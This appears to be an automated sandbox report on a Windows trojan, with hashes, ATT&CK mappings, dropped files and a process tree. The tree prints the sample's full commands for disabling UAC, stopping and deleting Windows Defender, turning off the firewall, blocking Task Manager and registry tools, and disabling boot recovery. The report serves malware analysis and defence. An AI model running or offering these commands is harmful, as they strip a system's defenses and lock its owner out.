Overview

overview

10

Static

static

10

0778d2ae60...93.exe

windows10-2004-x64

10

2005110ee8...24.exe

windows10-2004-x64

10

290072a9e1...51.exe

windows10-2004-x64

10

3998d0e987...7f.exe

windows10-2004-x64

10

435844f4e1...2b.exe

windows10-2004-x64

3

495fbfecbc...72.exe

windows10-2004-x64

1

542c157186...88.exe

windows10-2004-x64

10

561d7f0505...35.exe

windows10-2004-x64

10

617364875d...bb.exe

windows10-2004-x64

3

6312ac9176...d8.exe

windows10-2004-x64

10

63545fa195...8a.exe

windows10-2004-x64

10

6555038a04...42.exe

windows10-2004-x64

10

677393ff5e...59.exe

windows10-2004-x64

1

680caf0e30...75.exe

windows10-2004-x64

10

70192d461c...8b.exe

windows10-2004-x64

3

76199c2662...6d.exe

windows10-2004-x64

3

8727091cbb...44.exe

windows10-2004-x64

10

91450f9e8a...dc.exe

windows10-2004-x64

10

93386ea79c...b9.exe

windows10-2004-x64

6

942bc9e43e...7c.exe

windows10-2004-x64

10

ac7a29cb82...b8.exe

windows10-2004-x64

10

baa851154b...1f.exe

windows10-2004-x64

10

bb5ca9d8de...69.exe

windows10-2004-x64

10

c15e2ffa84...07.exe

windows10-2004-x64

10

c743ba0861...26.exe

windows10-2004-x64

cfda742c2d...e5.exe

windows10-2004-x64

10

d1d74ec103...34.exe

windows10-2004-x64

1

d765e722e2...b9.exe

windows10-2004-x64

10

daa41f5230...de.exe

windows10-2004-x64

9

ed12ea76d0...0a.exe

windows10-2004-x64

10

f062577b68...e0.exe

windows10-2004-x64

10

f244a04265...35.exe

windows10-2004-x64

10

Resubmissions

13-07-2024 09:54

240713-lxcvgawdmn 10

13-07-2024 09:52

240713-lv46yawdkj 10

13-07-2024 09:46

240713-lrz3tayajc 10

Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-07-2024 09:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe

  • Size

    3.8MB

  • MD5

    15995b0b1fc5dd82f1c3ba1b7b40c5d4

  • SHA1

    3b6a4a5b8b1107854e35b01cd28b4cce7a003413

  • SHA256

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35

  • SHA512

    4ebe82a5d5d499eab10c9049647283976d95f102b24b2113bd59309ea107fb6cf8671640651e7d7cf13435e516c6d2dcbfe3a2fc8a8ed917398b3d86f6a77781

  • SSDEEP

    49152:aApBOr1sU6uEgjhlOCDw8mEFAuYg2OWpTMqBx+fdTmG2Y4MT9ffD+CzKcbmoivTN:

Score
10/10
evasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
    "C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\prorun.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:1284
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide icacls " \System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1672
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4288
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5028
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2448
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3828
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc stop windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc delete windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add - MpPreference - ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2052
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          3⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - EnableControlledFolderAccess Disabled"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - PUAProtection disable"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - HighThreatDefaultAction 6 - Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ModerateThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - LowThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - SevereThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ScanScheduleDay 8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1784

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    2
    T1562

    Disable or Modify System Firewall

    1
    T1562.004

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      149d8ea75129b5bac13935c6f7ee2b40

      SHA1

      ec14c55a848e3dd28e474e8a67276589022ee5fa

      SHA256

      e4a07720c6d373c2e2e13ca98e4ccc169d6bf4fa15df35fef9a4d69185e023bd

      SHA512

      fb65b85dc3f4341dbf6640355c25238f31fade0547fc6214f7c83d70f6d98f05fa43a6fe7c1ec9e9454a463d482eb77efca0dbccc157baabd15bf89c865e27bc

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      e5bfec1063a497048fffb231a0621403

      SHA1

      97cf6a89f237f43b9c22e3e081f7d45924d435ba

      SHA256

      325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

      SHA512

      e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      58b97594c4d764d5d99a459fbee0fd33

      SHA1

      4d1f8f4f5bbf87a6ea3ae7b7be623542377365da

      SHA256

      8001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2

      SHA512

      874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      e89c193840c8fb53fc3de104b1c4b092

      SHA1

      8b41b6a392780e48cc33e673cf4412080c42981e

      SHA256

      920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

      SHA512

      865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      38f0f14cc7ca72ad51216866e66efb4e

      SHA1

      34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

      SHA256

      668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

      SHA512

      4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      ef5ef35c3059825861b16409862d0e3d

      SHA1

      cde5311765478b1bcf309219c1a86a0238612099

      SHA256

      53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b

      SHA512

      3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      b9c2e6782fd47c983dc61478147f7176

      SHA1

      ebaf50c810dbeca3846867c685d77ae4c871f253

      SHA256

      010430a83f5f1bbd71687b20e9055bbdf643c4c4c5d2b9a5d18098a751750a0b

      SHA512

      bbca313407db73166df19c9a6e5c0ddd520f316dd7ddc0160b2a0cb31139e45aef6f2cff667a3025df56f2bb5e36a4b25dab39a16ff9f914857588d4e3e19834

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      5ed3bd9bc72e312aadc7571ad8786379

      SHA1

      c6cc90bf1250e7ec5cd7680a9689940cec6398da

      SHA256

      8c54d4148a9e2a3b524f471f99aa3d48778239ae494908b544ef8f014d7d0eee

      SHA512

      d020f76b71142f58c990f62354c568d9cee901a2e808d11d4e6d439aa3ffc36f070d613e3bd9522aaa1d44d3288c91c89fcf911600fdad9e96d3900c12941c47

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      Filesize

      247KB

      MD5

      5cae01aea8ed390ce9bec17b6c1237e4

      SHA1

      3a80a49efaac5d839400e4fb8f803243fb39a513

      SHA256

      19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

      SHA512

      c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rq2vo3nv.fj1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\prorun.bat
      Filesize

      2KB

      MD5

      0f887625226181fb0136e6145919e56a

      SHA1

      1477b214aafcf9a518f7a13832da00d639f22943

      SHA256

      8706ff21236560835dff325f9ed3f32a96c3964806b04b49fff9b20e1df856d8

      SHA512

      81a68c2addd5bfd9a913f70352dafd643013f61ec42b3e9943caffc6f7e80a9521f70e69c13e9ab1c170cbdb4f1d2920384cacb3cbebab58d5dbb61574f44b7b

      Download Submit

    • memory/2052-29-0x00000260F5730000-0x00000260F5752000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2612-0-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2612-14-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2612-1-0x0000023B60B20000-0x0000023B60EF6000-memory.dmp

      Filesize

      3.8MB

      Download

    • memory/2612-141-0x0000023B62D30000-0x0000023B62D50000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2612-142-0x0000023B7B5C0000-0x0000023B7B5CA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2612-143-0x0000023B7B8B0000-0x0000023B7BA1A000-memory.dmp

      Filesize

      1.4MB

      Download